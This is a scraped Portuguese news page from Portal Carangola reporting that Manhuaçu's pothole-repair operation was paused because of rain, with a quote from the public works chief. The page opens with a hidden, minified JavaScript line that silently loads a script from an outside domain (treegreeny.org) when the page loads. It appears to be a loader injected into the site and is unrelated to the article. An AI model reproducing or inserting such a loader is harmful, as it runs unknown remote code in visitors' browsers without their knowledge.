;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Operação tapa buracos foi interrompida momentaneamente. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Operação tapa buracos foi interrompida momentaneamente.

A Secretaria de Obras de Manhuaçu estava desencadeando operação tapa buraco em vários bairros de Manhuaçu. O serviço teve que ser interrompido por motivo da chuva.
No mês de fevereiro, quando teve inicio a operação, a equipe percorreu algumas localidades para corrigir problemas nas vias. São Vicente, Colina, Alfa Sul, Bom Pastor e parte Matinha já receberam o serviço. O problema é que a continuidade foi comprometida porque o asfalto não tem tempo de afixar solo quando chove. O chefe de Obras Isaias Gomes disse que a interrupção é provisória. “Tão logo o tempo firme vamos continuar com a operação tapa buraco. Pedimos à população que compreenda e aguarde que vamos atender a todos os bairros. Já fizemos o serviço em vários locais e queremos finalizar tudo o mais rápido possível”.
Nos bairros atendidos até o momento, alguns trechos precisaram de recapeamento. Em alguns locais foram feitos quebra-molas também.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.